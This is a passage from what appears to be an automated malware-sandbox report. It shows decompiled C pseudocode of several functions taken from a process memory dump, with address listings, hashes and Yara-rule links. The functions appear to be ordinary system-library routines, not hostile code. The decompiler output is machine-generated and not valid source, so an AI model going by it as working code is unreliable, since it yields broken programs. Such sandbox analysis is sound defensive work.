							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x046c740d
0x046c740d
0x046c7412
0x046c7413
0x046c7416
0x046c7418
0x046c741c
0x046c741f
0x046c7422
0x046c7422
0x046c7428
0x046c742a
0x046c742a
0x046c7451
0x046c7432
0x046c744f
0x046c744f
0x00000000
0x046c7434
0x046c7438
0x046c7443
0x046c7517
0x046c7517
0x046c751a
0x046c7535
0x046c7520
0x046c7527
0x046c752c
0x046c7531
0x046c7533
0x00000000
0x046c7533
0x00000000
0x046c7531
0x046c754b
0x046c754f
0x046c755c
0x046c755c
0x046c755f
0x046c7560
0x046c7561
0x046c7562
0x046c7563
0x046c7568
0x046c756a
0x046c756c
0x046c756d
0x046c756d
0x046c756f
0x046c7572
0x046c7574
0x046c7577
0x046c757c
0x046c757f
0x00000000
0x046c7551
0x046c7551
0x046c7551
0x046c7553
0x046c7553
0x046c7449
0x046c7449
0x046c744c
0x046c744c
0x00000000
0x046c744c
0x046c7443
0x046c750e
0x046c7514
0x046c7514
0x046c7455
0x046c7469
0x046c746d
0x00000000
0x046c7473
0x046c7473
0x046c7476
0x046c7480
0x046c7484
0x046c748e
0x046c7493
0x046c7493
0x046c7496
0x046c7499
0x046c74a1
0x046c74b1
0x046c74b5
0x00000000
0x046c74bb
0x046c74c1
0x046c74c1
0x046c74c4
0x046c74c5
0x046c74c6
0x046c74c7
0x046c74c8
0x046c74cd
0x00000000
0x046c74d3
0x046c74d3
0x046c74d6
0x046c74d8
0x046c74db
0x046c74dd
0x046c74e0
0x046c74e7
0x046c74ee
0x046c74ee
0x046c74f4
0x046c74f9
0x00000000
0x046c74fb
0x046c74fb
0x046c74fd
0x046c7500
0x046c7503
0x046c7505
0x046c7505
0x046c74f9
0x00000000
0x046c74cd
0x046c74b5
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: b9b2b9c85d754e60c1afe9d86669f04a1212ef5401d7465a97b482fd73295877
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: A8516A71600606EFDB15CF14C480AA6BBB5FF45309F14C0AEE9089F221EB71EA46CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04622990, Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E04622990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x46cff00);
				E0464D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x45d1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0463E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x45d1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E046751BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x45d166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E04622AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E04606600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E04622C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0460EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E04622AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E04622C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E04622ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0464D0D1(_t62);
				goto L28;
			}

0x04622990
0x04622992
0x04622997
0x046229a3
0x046229a6
0x046229ab
0x046229ad
0x046229b2
0x04665c80
0x046229b8
0x046229b8
0x046229bb
0x046229c0
0x046229c5
0x046229c6
0x046229c6
0x046229cb
0x00000000
0x00000000
0x046229cd
0x046229d0
0x046229d9
0x046229db
0x046229dd
0x04622a7f
0x04622a84
0x04622a87
0x04622a89
0x04665ca1
0x04665ca3
0x00000000
0x04622a8f
0x04622a8f
0x00000000
0x04622a8f
0x00000000
0x046229e3
0x046229e3
0x046229e3
0x00000000
0x046229e3
0x046229dd
0x00000000
0x046229db
0x046229e6
0x046229e9
0x046229eb
0x046229ed
0x046229f3
0x046229f5
0x046229f8
0x046229fa
0x04622a97
0x04622a9a
0x04622a9d
0x04622add
0x00000000
0x04622a9f
0x04622aa2
0x04622aa5
0x04622aa8
0x04622aab
0x04665cab
0x04665caf
0x04665cc5
0x04665cda
0x04665cdc
0x04665cdf
0x04665ce5
0x00000000
0x04665ceb
0x04665ced
0x04665cee
0x00000000
0x04665cee
0x04665cb1
0x04665cb4
0x04665cb9
0x04665cbb
0x00000000
0x04665cbd
0x04665cbd
0x00000000
0x04665cbd
0x04665cbb
0x04622ab1
0x04622ab1
0x04622ac4
0x04622ac6
0x04622ac6
0x00000000
0x04622ac6
0x04622aab
0x00000000
0x04622a00
0x04622a09
0x04622a0e
0x04622a21
0x04622a24
0x04622a35
0x04622a3a
0x04622a3d
0x04622a42
0x04622a59
0x04622a59
0x04622a5c
0x04622a5f
0x04622a5f
0x046229fa
0x046229f3
0x04622a64
0x04622a64
0x04622a6b
0x04622a6b
0x04622a6d
0x04622a72
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0218206f56bb69cbfc61ff18b98bfc9ca38e9627eb1d8c5e292637bc94cb262
Instruction ID: f9235889f4ace4b9eb0699090b85206eae6ed56dfa538bcef24806da3917519d
Opcode Fuzzy Hash: c0218206f56bb69cbfc61ff18b98bfc9ca38e9627eb1d8c5e292637bc94cb262
Instruction Fuzzy Hash: B0517871A00629FFDF25DF55C990AEEBBB1BF58314F008099E801AB360E331A952CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04624D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04624D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x46ed360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0463FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x46e7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0463B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L04614620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E045FCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0463B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0463F380(_t67 + 0xc, 0x45d5138, 0x10) == 0) {
								 *0x46e60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E04624F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E04624E70(0x46e86b0, 0x4625690, 0, 0) != 0) {
					_t46 = E045FCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x04624d3b
0x04624d4d
0x04624d53
0x04624d58
0x04624d65
0x04624d6c
0x04624d71
0x04624d77
0x04624d7f
0x04624d8c
0x04624d8e
0x04624dad
0x04624db0
0x04624db7
0x04624db8
0x04624db9
0x04624dba
0x04624dbb
0x04624dc1
0x04624dc8
0x04624dcc
0x04624dd5
0x04624dde
0x04624ddf
0x04624de0
0x04624de1
0x04624de6
0x04624de7
0x04624de9
0x04624df3
0x00000000
0x00000000
0x04666c7c
0x04666c8a
0x04666c8a
0x04666c9d
0x04666ca7
0x04666cac
0x04666cb2
0x04666cb9
0x00000000
0x04666cbf
0x04666cbf
0x00000000
0x04666cbf
0x04666cb9
0x04624dfb
0x04666ccf
0x04666cd3
0x04624e32
0x04624e39
0x04666ce0
0x04666cf2
0x04666cf2
0x04666ce0
0x04624e3f
0x04624e41
0x04624e51
0x04624e51
0x04624e03
0x04624e03
0x04624e09
0x04624e0f
0x04624e57
0x00000000
0x00000000
0x04624e1b
0x04624e30
0x04624e5b
0x04624e5b
0x00000000
0x04624e30
0x04624e11
0x04624e11
0x04624e16
0x00000000
0x04624e16
0x04624e01
0x00000000
0x04624e01
0x04624da5
0x04666c6b
0x00000000
0x04624dab
0x04624dab
0x00000000
0x04624dab

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d4bbde9a3306d4eab6f7a4db022a8c80de4df41766292c2cb29c2b309af4cba
Instruction ID: af442a1bb9a033e29dff9a89fce48f45d48eca5478cce20249fc1dccc491e2c2
Opcode Fuzzy Hash: 4d4bbde9a3306d4eab6f7a4db022a8c80de4df41766292c2cb29c2b309af4cba
Instruction Fuzzy Hash: E541B371A40728AFFB21DF14CE80BA6B7A5EB54714F040099E9469B290FB74FD44CE91

Uniqueness

Uniqueness Score: -1.00%

Function 04624BAD, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E04624BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x46ed360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E045FCC50(_t86);
					L11:
					return E0463B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x46e8504
				E04612280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0463FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0463B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L04614620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E045FCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x46e8504
								E0460FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E04624F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x04624bad
0x04624bbf
0x04624bc2
0x04624bc6
0x04624bcd
0x04624bd9
0x046667fe
0x04666800
0x04624ccc
0x04624ccd
0x04624cb7
0x04624cc9
0x04624cc9
0x04624bdf
0x04624be5
0x00000000
0x00000000
0x04624beb
0x04624bef
0x00000000
0x00000000
0x04624bf5
0x04624bf9
0x04624c06
0x04624c0b
0x04624c17
0x04624c1c
0x04624c1f
0x04624c25
0x04624c33
0x04624c3d
0x04624c40
0x04624c43
0x04624c47
0x04624c4d
0x04624c53
0x04624c54
0x04624c55
0x04624c56
0x04624c5b
0x04624c5c
0x04624c63
0x04624c6b
0x00000000
0x00000000
0x04666776
0x04666784
0x04666784
0x0466679f
0x046667a7
0x046667af
0x046667ce
0x00000000
0x046667b1
0x046667b7
0x046667b8
0x046667c1
0x046667d3
0x046667d9
0x046667dd
0x04624c94
0x04624c94
0x04624c98
0x04624c9c
0x04624ca3
0x046667f4
0x046667f4
0x04624cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x04624cb5
0x04624c79
0x04624c7e
0x04624c89
0x04624c8b
0x04624c8f
0x04624c8f
0x00000000
0x04624c89
0x046667c3
0x00000000
0x046667c3
0x046667af
0x04624c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7337ea5cf9c552fc83e9415c1374c553d79fde9bde595da0f9039b7d6b07ae5
Instruction ID: 9f8e24aa9adcf6365f0ece080da50bff16c07d3b92c333d09447261dbd5bf2db
Opcode Fuzzy Hash: c7337ea5cf9c552fc83e9415c1374c553d79fde9bde595da0f9039b7d6b07ae5
Instruction Fuzzy Hash: 3241A171A00628ABDB21DF68C940BEA77B4EF45700F0105A9E909AB350FB74AE80CF95

Uniqueness

Uniqueness Score: -1.00%

Function 04608A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E04608A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x46ed360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0463B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0460E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x45d1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E04621DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E04633C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E04608999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x04608a0a
0x04608a1c
0x04608a23
0x04608a2e
0x04608a30
0x04608a36
0x04608a3c
0x04608a3e
0x04608a4a
0x04608a52
0x04608a9c
0x04608aae
0x04608a58
0x04608a5e
0x04608a6a
0x04608a6f
0x04608a75
0x04608a7d
0x04608a85
0x04608a86
0x04608a89
0x04608a93
0x04608a99
0x04608a9b
0x00000000
0x04608aaf
0x04608abe
0x04608ac3
0x04608acb
0x04608ad7
0x04608ae0
0x04608af1
0x00000000
0x04608af1
0x04608acd
0x04608ad5
0x04608afb
0x04608afd
0x04608aff
0x04608b07
0x04608b22
0x04608b24
0x04608b2a
0x04608b2e
0x04608b3f
0x04608b78
0x04608b41
0x04608b52
0x04608b54
0x04608b5c
0x04608b74
0x04608b74
0x04608b5c
0x04608b3f
0x04608b5e
0x04608b61
0x04608b64
0x04608b64
0x04608b6c
0x04608b6c
0x04608b11
0x04659cd5
0x04659cd5
0x04608b17
0x04608b1a
0x04608b1a
0x00000000
0x04608ad5
0x04608a89

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feca220b9af8870e62f9b07f3d9b569b1db64e943b3e19fd8e8469901b4885ef
Instruction ID: bb3e1d66b66f3687ce8fa09662b8374ffecc90b2fb0199f1193d6c17d51dc359
Opcode Fuzzy Hash: feca220b9af8870e62f9b07f3d9b569b1db64e943b3e19fd8e8469901b4885ef
Instruction Fuzzy Hash: 854142B1A403289BDB28DF55C888AAAB7F4EF54300F1085E9D81997391F770AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 046BFDE2, Relevance: .1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E046BFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E046BFD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E046C0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E04617D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E046B1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E046C2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E046BC8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E046BDBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E04617D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E046BA80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}

0x046bfde7
0x046bfde8
0x046bfdec
0x046bfdee
0x046bfdf5
0x046bfdf7
0x046bfdfc
0x046bfe19
0x046bfe22
0x046bfe26
0x046bfec6
0x046bfecd
0x046bfed5
0x046bfee7
0x046bfed7
0x046bfee0
0x046bfee0
0x046bfeef
0x046bff00
0x046bff02
0x046bff07
0x046bff07
0x00000000
0x046bfeef
0x046bfe33
0x046bfe55
0x046bfe59
0x046bfe5b
0x046bfe5e
0x046bfe69
0x046bfe6d
0x046bfe6d
0x046bfe69
0x046bfe35
0x046bfe41
0x046bfe41
0x046bfe79
0x046bfe8b
0x046bfe7b
0x046bfe84
0x046bfe84
0x046bfe93
0x00000000
0x046bfea8
0x046bfeba
0x00000000
0x046bfeba
0x046bfdfe
0x046bfe01
0x046bfe02
0x046bfe08
0x046bff0c
0x046bff14
0x046bff14

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction ID: d10865f982d7d0fe067238d72d8fc2f19816a65b17ed8e0e6e7936ebeae3b850
Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
Instruction Fuzzy Hash: D031D332700640AFD32A9B78CC44FBA7BA9EB85650F184459E485CB762FA74F882C794

Uniqueness

Uniqueness Score: -1.00%

Function 046BEA55, Relevance: .1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E046BEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E04612280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E046BE815(_t58, _t75);
